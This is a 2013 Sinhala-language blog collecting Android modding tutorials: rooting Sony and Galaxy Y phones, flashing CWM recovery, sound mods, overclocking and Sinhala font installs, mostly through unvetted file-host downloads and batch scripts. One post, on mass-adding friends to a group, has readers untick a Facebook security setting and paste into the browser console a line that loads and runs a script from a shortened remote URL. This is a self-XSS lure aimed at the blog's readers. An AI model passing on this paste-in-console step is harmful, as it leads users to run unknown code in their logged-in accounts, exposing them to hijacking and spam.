Monday, April 29, 2013

පට්ට බේස් ඔන්න ඔන්න ACID

අද මමදෙන්න්ම් වටිනා කියන දෙයක්,

කන් අඩි පැලෙන්න බේස් වදින එකක් ගැන තම මම මේ කියන්න යන්නේ,

මෙන්න මම මේ දෙන ලින්ක් ටික ඩව්න්ලෝඩ් කරලා sd කඩ් එකට දාලා ෆ්ලෑෂ් කරන්න තින්නේ,
මේක කරන්න රූට් කරලා තින්නත් ඕනා,CWM දාලා තින්නත් ඕනා,

1. http://www.mediafire.com/download.php?f6i1tkoatafc3kl

2. http://www.mediafire.com/?aka92v3swoy6veb

3.  http://www.mediafire.com/?7n85h8l2psnztbx

4. http://www.mediafire.com/?bnoonxox5dirt5k

Tuesday, April 16, 2013

delete වෙච්ච සියලු දෑ නැවත ගනිමු.

අද මම දෙන්න යන්නේ වටිනා කියන දෙයක්,ඒ කියන්නේ ඔයාලට වැරදීමකින්,හදිස්සියට ඩිලීට් වෙච්ච දේවල් අයෙ ගන්න ක්‍රමයක්.

(රිසයිකල් බින් එකෙනුත් ඩිලීට් වෙච්ච දේවල් ගන්න ක්‍රමයක්)

මෙන්න මේ සොෆ්ට්වෙය කැල්ල ඒ සදහා ඕන කරනවා.

මෙන්න මේ සොෆ්ට්වෙය කෑල්ල බාගෙන තමන් වැරදිලා ඩිලීට් කරපු තැනට ගිහිල්ලා ස්කෑන් පාරක් දන්නා.

එදා මෙදා තුර ඩිලීට් වෙච්ච හැම දේම එයි..

ඊට පස්සේ තමන්ට ඒ දේ නැවත ගන්න පුළුවන්.


හොද නම් අදහස් උදහස් දාලා යන්නකෝ?

Friday, April 12, 2013

සෝනි U එකකට CWM දාමු - දෙවන කොටස

මේක තම මට හම්බුනා පට්ටම ලේසි ක්‍රමය

4න් එකකින් වැඩ කැලි දාලා වැඩ්ඩේක් වෙන්න වගේම අප්ඩේට් නැති අයට කස්ටෝම් රෝම් පිහිට පතන්න අනිවා උදව් කරන්නේ වෙන කව්රුත් නෙමෙයි CWM

බලමු දාන විදිය?

මුලින්ම මේක බාගන්න..

ගන්නකො

ඊට පස්සේ සිප් එක එක්ස්ට්‍රක්ට් කරලා එකේ තින install.bat මේක ක්ලික් කරන්න.

ෆිනිශ්ඩ් වේනකම් ඉන්න . එන්ටර් ගහන්න / දැන් ගොඩේ ගොඩ

4න් එක ඔෆ් කරන්න, අයේ ඕන් කරන්න සෝනි ලෝගෝ එක එනකොටම සව්න්ඩ් අඩු කරන බටන් එක ඔබ ඔබ ඉන්න...

එතකොට ඔයාලට යන්න පුළුවන් CWM එකට
(මේක දාන්න රූට් කරලා තින්න ඕනා 4න් එක)

කෙස් එකක් ගියොත් මම වග කියන්නේ නෑ....

Tested - සෝනි U ICS = .10 / .54 / .100



සෝනි ෆෝන් එකකට CWM Recovery දාමු - පළමු කොටස

මෙන්න අද අපි බලන්න යන්නේ සෝනි 4න් එකකට නැතුවම බැරි දෙයක්,මේක දාගත්තම හෙන වැඩ තොගයක් දාලා යාලුවෝ ඉස්සරහ හෙන පොරක් වෙන්න පුළුවන්.

මේක සෝනි ගොඩක් 4න් වලට සපෝට් කරනවා.

Recovery X මෙන්න බුලට් එක.

ඔයාලගේ 4න් එකේ මුලින්ම
01. USB Debugging 

02. Unkown Sources
      ඔන්කරන්න.

අමතක උනානේ මෙන්න ඩව්න්ලෝඩ් ලින්ක් එක.

ඒහෙන්ම් මෙතනින් බාගන්නකො
http://forum.xda-developers.com/showthread.php?t=1773227


මෙතන කරන්න ඕන විදිය ස්ක්‍රීන් ෂොට් එක්කම ලස්සනට තිනවා,

මේක ඉවර උනාම CWM එක වැටිලා තියෙයි.
CWM එකට යන්නේ කොහොමද කියල තම ඔයාලගේ ප්‍රශ්නේ ඊළගට.

4න් එක ඔෆ් කරන ඔන් කරනකොට සෝනි ලෝගෝ එක එනකොටම සව්න්ඩ් අඩු කරන බටන් එක ඔබ ඔබ ඉන්න එත්කොය CWM එලට යන්නේ පුළුවන්.

ඊට පස්සේ  REBOOT SYSTEM NOW දෙන්න වැඩේ ඉවරයි.

ටෙස්ට් කලේ සෝනි U එකක(එලකිරියටම වැඩ කරා)

වෙන අව්ල් වලට මම නෑ ඔන්න.......!#@%$#



 

සෝනි U ෆෝන් එකක් රූට් කරමු - දෙවන කොටස

ඕනෑම දෙයක් කරන්න ක්‍රම බර ගානක් තිනවා,
එක හරි යන්නේ නැත්නම් මේක මේක හරි යන්නේ නැත්න්ම එක.

මෙන්න සෝනි 4න් එකක් රූට් කරන්න තවත් ක්‍රමයක්
මේක නම් පට්ටම ලේසි ක්‍රමයක්...
අපි බලමු කරන හැටි.

මුලින්ම මේක ඩව්න්ලෝඩ් කරගන්නකො......?

http://uploaded.net/file/45k0f6t7

ඊළගට මේක එක්ස්ට්‍රැක්ට් කරලා එකේ තිනවා ෆයිල් එකක් RunMe.bat

මේවා කරන්න ඉස්සල්ල ඔයාලගේ 4න් එකේ 
Menu>>Settings>>Developer options>>USB debugging
 මේක ඕන කරලා 4න් එක කෝම්පියුටර්  එකට කනෙක්ට් කරලා ඉන්න.

ඊට පස්සේ   RunMe.bat මේක ඩබල්  ක්ලික් කරන්න.
ඊට පස්සේ  1 ගහලා එන්ටර කරලා බලන් ඉන්න  ඉච්චරයි.........

එට පස්සේ ඔයාලගෙන් අහයි  4න් එක Backup කරන්නද  Restore කරන්නද කියල.
Restore දෙන්න එතකොට 4න් එක ඔෆ් වෙලා ඔන් වෙයි.

මෙනු එකේ සුපර්යුසර්  අයිකන්  එක දකින්න තියෙයි...
ඒ කියන්නේ ඔයාලගේ 4න් එක රූට් කරලා.
මන් මේක ටෙස්ට් කරේ නම් සෝනි U එකකින් හොදේ.
100% වැඩ.
වැඩේ සාර්ථක උන නම් කොමෙන්ටුවක් දාලා යන්නකෝ.........!@


ගැලෑක්සි Y එකට CHAINFIRE 3D ?

පොඩි 4න් එකකින් හොද ගේම් ගහන්න ක්‍රමයක්.............!

මුලින්ම අපි CHAINFIRE 3D සෙටප් එක ගන්න ඕන,ඔයාල අන්ද්රොයිඩ් මාකට් එකෙන් එක ගන්න පුළුවන්.
නැත්නම් මෙන්න එක
https://play.google.com/store/apps/details?id=eu.chainfire.cf3d&referrer=utm_source%3Dgoogle&utm_medium=organic&utm_term=chainfire+3d


ඊළගට කරන්න ඕන එකට ඕන ප්ලග්ඉන් ටික ධව්න්ලෝඩ් කරගන්න එක.....

මෙන්න ඒ ටික..හැමදේම දෙනවා බයවෙන්න එපා

 01. http://www.mediafire.com/?2mh6uarwv1o9u5f
 02. http://www.mediafire.com/?l42lo2b72vmc958
 03. http://www.mediafire.com/?l42lo2b72vmc958


ඔන්න ප්ලග්ඉන් 3ත් හරි....

ඊළගට අපි මුලින්ම ගත්තා සෙටප් එක 4න් එකට INSTALL කරන්න..
install කරලා ඉටපස්සේ CHainfire 3D එක ඕපන් කරලා,මෙන්න මේක ක්ලික් කරන්න.

CF3D DRIVER

ඊළගට

INSTALL

දැන් 4න් එක ඔෆ් වෙලා ඕන වෙයි..

ප්ලගඉන් 3 SD කාඩ් එකෙන් දෙන්න...(එයාල ඔටෝ සච් කරලාප්ලග්ඉන් 3 තින තැන හොයාගන්නවා....
ඒකෙන් පිළිවෙලට ප්ලගින් 3 දෙන්න.

ඊට පස්සේ
එකේම තින Defult open GL setting දෙන්න.

එකේම තින Use plugin එකෙන් Qualcomm තෝරලා දෙන්න ඒච්චරයි.
ඔයලට අමාරුවක් නැත් කියලා මම හිතනවා.
ඔන්න ඔහොම තමා වැඩේ තින්නේ.මොකක්හරි කෙස් එකක් ගියොත් මම නම් නැ

වැඩේ හොද නම් ඔයාලට හිතට එන අදහස් උදහස් දාලා යන්නකෝ?

Samsung Galaxy Y එකට හෙන ගහන්න සව්න්ඩ්

සැම්සුන්ග් ගැලෑක්සි Y

මේ වඩේන් මේ පොඩි 4න් එකේ සව්න්ඩ් පට්ට කොලිටි වෙනවා,චර චර සද්ද එන්නේ නැ සින්දු අහනකොට.

ඔන්න කරන විදිය, මොනවා කරන්නත් 4න් එක රූට් කරලා තින්න ඕන,

රූට් කරලා ඇති කියල මම හිතනවා,

මේ ගේම් එක දෙන්න ගිහින් 4න් එකට මොකක් හරි උනොත් මම නම් වග කියන්නේ නැ.,,?
(එක මතක තියාගන්නකෝ)

01. මුලින්ම අපි මෙන්න මේක ගන්න ඕන

 http://www.mediafire.com/?fm54d4v19c5b89s


ඔන්න ඒහෙන්ම් එක අරගෙන Sd cad එකට දාගන්නකෝ,(ෆෝල්ඩර් ඇතුලට නම් දන්නා එපා.)

02. ඊළගට මේක.මේක තමා ඕනම එක
 http://www.mediafire.com/?gwc1c34keyi85ir


(මෙකත් SD cad එකට දාගන්න)


ඔන්න ඕකත් ගත්තනේ,ගන්න ඒවා එච්චරයි.

මෙන්න කරන විදිය.

මුලින්ම අපි රිකවරි මෝඩ එකට යන්න ඕන,
(සව්න්ඩ් වැඩි කරන බටන් එකයි.ලොක් බටන් එකයි,හෝම් බටන් එකයි එක පාර ඔබන්න)

දැන් රිකවරි මෝඩ එකට එනවා.

එකෙන්
01. Apply updete from sd cad දෙන්න.

ඊටපස්සේ

02. CWM.zip එක තෝරලා දෙන්න.

එක ඉන්ස්ටෝල් උනාට පස්සේ එන ලිස්ට් එකෙන් install zip from sd cad දෙන්න,

03. එකෙන් චුස් ziපp from sd cad එකෙන්
bass_kuro_v3.zip මෙන්න මේ zip ෆයිල් එක තෝරලා දෙන්න.

එකෙන් yes-install bass_......

ඕක තෝරලා දෙන්න.
ඊට පස්සේ install වෙයි.
බච්ක් බටන් එක ඔබලා(ලොක් බටන් එක)

reboot system now දෙන්න වැඩේ ගොඩ

දැන් ඔයාලගේ පට්ටම සව්න්ඩ් අත්විදින්න.

වැඩේ හොදද බලන්නකෝ.

සැම්සුන්ග් ගැලෑක්සි Y ඔවර්ක්ලොක් කරපු හැටි

******* මේක කරාම 4න් එකේ SPEED එක වැඩි කරගන්න පුළුවන්,

ඒ කියන්නේ ප්‍රොසෙසර් එකෙන් දෙන වේගය  වැඩි කරගන්න පුළුවන් ********

මේක කරන්න 4න් එක රූට් කරලා තින්න ඕන.
ඔයාල ගැලෑක්සි Y එක රූට් කරලා ඇති කියල මම හිතනවා.

මෙන්න මුලින්ම කරන්න ඕන දේ?

මුලින්ම මේ මේ ෆයිල් එක ඩව්න්ලෝඩ් කරගන්න ඕන.

එක SD cad එකට දාගන්න
ඊට පස්සේ රිකවරි මොඩ් එකට දාගන්න,

(සව්න්ඩ් වැඩි කරන බටන් එකයි,ලොක් බටන් එකයි,හෝම් එකයි එක පර තද කරගෙන ඉන්න)

Thursday, April 11, 2013

ඇන්ද්‍රෝයිඩ් ෆෝන් එකට සින්හල දාමු

                    අද බලන්න යන්නේ ගොඩක් අයට තින ප්‍රශ්නයක් ගැන සිංහල දැමීම ගැන,මන් දැම්මේ නම් කරන්න පුළුවන් ලේසිම ක්‍රමය , ඔයාලට කොහොම වෙයිද දන්නේ නැ

                    මේ ක්‍රමය ඕනෑම රූට් කරපු 4න් එකකට වලංගුයි..

රූට් කරලා නැත්නම් කරගන්න ------>> රූට් වෙන්න

මේකෙන් වෙන කෙස් ගැන මම නම් වග කියන්නේ නැ, එක මුලින්ම කියන්න ඕන , හැබැයි මේක කරන්න 4න් එකරූට් කරලා තින්න ඕන.

ඔන්න එහෙනම් ගේමට බහින්න යන්නේ



මේන්න මේක තමා මුලින්ම ගන්න ඕන,මෙන්න මේකෙන් තමා සම්පුර්ණ ගේම් එකම දෙන්න තින්නේ :v ඒ කිව්වේ මේක තමා සිංහල ෆොන්ට් එක

ගන්න මොබයිල් ෆොන්ට් පැක් එක
මෙතන ගොඩක් ෆොන්ට් තිනවා තමන්ට  ඕන කරන ෆොන්ට් එක අරන් මෙන්න මේ විදියට රිනෙම් කරලා සිස්ටම් / ෆොන්ට් වලට ඔය කියා දෙන විදියට දාගන්නකෝ ?
**** DroidSansFallback  *** මෙන්න මේ නමට තමන්ට ඕනා කරන ෆොන්ට් එක රිනෙම් කරන්න 
මට නම් හොදම එක ඔය ෆොන්ට් පැක් එකේ DroidSansFallback කියලා දීලා තින ෆොන්ට් එකම තමා ...
මේ ෆොන්ට් එකින් එකෙට වෙනස් චෙක් කරලා හොදම එක හොයාගන්න.

ගෘප් එකට කට්ටිය සෙට් කරමු

මෙන්න වැඩේ සිම්පල් වැඩක් හිතන තරම් අමාරු නැ,
තමන්ගේ හැම ෆ්‍රෙන්ඩ් කෙනෙක්ම තමන්ගේ ගෘප් එකට එනවා මේ පොඩි දේ කරානම්,
ඔය ලොකු ලොකු ගෘප් එකපාරටම හදන ක්‍රමය තමා අද මන් මේ කියාදෙන්නේ,
අපිට මේ වැඩේ කරන්න ඕන නම් සාමාන්‍ය විදියට කරන්න බැ, http:// අයින් කරලා තමා ගෘප් එකට යන්න ඕන.

ඒවැඩේ කරන්න එච්චර අමාරු නැ.
මුලින්ම අපි එක කරමු.

 Account setting > security


ඔන්න ඔකේ තීන ටික් එක අයින් කරලා දන්නා වැඩේ ඉවරයි,
ඊට පස්සේ තමන්ට ෆ්‍රෙන්ඩ් ලා ඇඩ් කරගන්න ඕන ගෘප් එකට ගිහින් F12 ගහන්න,


ඒතකොට එන එකෙන් කොන්සල් එක තෝරලා මේ කෝඩ් එක පේස්ට් කරන්න.
ඔන්න ඒහෙන්ම් කෝඩ් එක

 document.body.appendChild(document.createElement('script')).src='http://goo.gl/gMN2z';

මේක ctrl+v ගහලා පේස්ට් කරලා,enter ගහන්න වැඩේ ඉවරයි,එට පස්සේ දඩ බඩ ගල ෆ්‍රෙන්ඩ් ඇඩ් වෙන්න ගනී,
එක ඉවර උනාට පස්සේ http:// එක ඔෆ් කරලා දන්න,දැන් අව්ලක් නැ.
එට පස්සේ ඔයාට පෙනෙයි, ෆ්‍රෙන්ඩ් ල ඇඩ් වෙලා තිනවා කියල,
100% working

මම නම් කරා,
ගින්දර වගේ හරි ගියා,මම නම් කරේ chrome එකේ,අනිත් ඒවත්  මෙහෙම්මම තමා,

 හොද නම් අදහසක් දාලා යන්නකෝ.....

අද අපි සෝනි පොන් එකක් රූට් කරමු - පළමු කොටස

මුල සිට සරලව

           මන් කරන්න කරන්න ගිය හැම එකකම වින්ඩෝස් 7 වල රූට් කරන්න බෑ (ඇඩ්මිනිස්ටර් එකේ අව්ලක් 7 වල)මන් අන්තිමට තීරණය කර තනිව සත්‍ය සොයා යන්න.එතකොටම මට සප් එකක් දෙන්න XDA සෙට් එක ආවා,අපි අද බලන්න යන්නේ ඒ සත්‍ය සරල සිංහලෙන් ඔයාලට කියා දෙන හැටි,

මුලින්ම අපිට ෆ්ලෂ්ටුල් සෙටප් එක ඕන කරනවා , ඔන්න එක ඒහෙනම් ගන්නකො?


http://androxyde.github.io/

මේක 107MB
ඔන්න එහෙනම් ඩව්න්ලෝඩ් කරගෙන ඉන්ස්ටෝල් කරන්නකෝ....?
ඉන්ස්ටෝල් කරලා එකපාරටම වැඩේ ගොඩ කියලා ඕපන් කරන්න යන්න එපා,

ඔපෙරාව සිංහල කරමු

අද බලන්න යන්නේ කොහොමද කියලා, ඔපෙරාමිනි සිංහල කරන විදිය,
කිසිම ගේමක් නැ ඒ වැඩේ නම් දන්නා අයත් ඇති,මේ නොදන්නා අයට,

මුලින්ම ඔපෙරාමිනි ඕපන් කරගන්න.එකේ උඩම තීන address bar එකේ www. අයින් කරලා
මෙන්න මේක ගහන්න,


opera:config


ඊට පස්සේ එන ලිස්ට් එකෙන්.අගටම තීන use bitmap font කියන එක no කියල ඇති .
yes කරන්න,ඊට පස්සේ සේව් කරන්න.



දැන් ඔයාලට සිංහල පේනවා opera මිනි එකෙන්.

හොද නම් අදහසක් දාලා යන්න......

සැම්සුන්ග් ගැලෑක්සි Y රූට් කරමු

අපි අද බලමු ගැලෑක්සි Y එක රූට් කරන හැටි! රූට් කරාම වාසි ගොඩයි
(මේ වැඩේන් 4න් එකේ පාලනය අපේ අතට ගන්න පුළුවන්)

1. සිංහල දාන්න පුළුවන්

2. හොද ගේම් ගහන්න පුළුවන්

තව පට්ට වාසි ගොඩක් තිනවා

මුලින්ම අපි updete.zip file එකේ ගන්න ඕන.එක චිප්  එකට දාන්න
මෙන්න  ඩව්න්ලෝඩ් ලින්ක් එක.


ඊට පස්සේ රිකවරි මෝඩ්  එකට යන්න ඕන...

  • සව්න්ඩ් වැඩි කරන බටන් එකයි,ලොක් බටන් එකයි,හෝම් බටන් එකයි එක පාර තද කරගෙන ඉන්න.
එතකොට රිකවරි මෝඩ් එකට යනවා,





රිකවරි මෝඩ් එකෙන් APPLY UPDETE FROM SD CARD දෙන්න..ඊට  පස්සේ එකෙන් UPDETE.zIP එක තෝරලා දීලා.. reboot system now now දෙන්න එච්චරයි...

රිබුට් උනාම බලන්න සුපර්යුසර් අයිකන් එක මෙනු එකේ තිනවද කියලා?
තිනවාන්ම් ඒ කියන්නේ රූට් වෙලා.


01.  apply updete from sd cad
02. UPDETE.ZIP එක තෝරලා දුන්නා..
03. Reboot system now දෙන්න

තමන්ගේ අතේ තමා ගේම තින්නේ.මම නම් මොකක්හරි උනොත් මම වග කියන්නේ නැ

ඔන්න ඔහොම තමා රූට් කරන්නේ

ඔයාලට ප්‍රයෝජනවත් උන නම් කොමෙන්ටුවක් දාලා යන්න අමතක කරන්න එපා.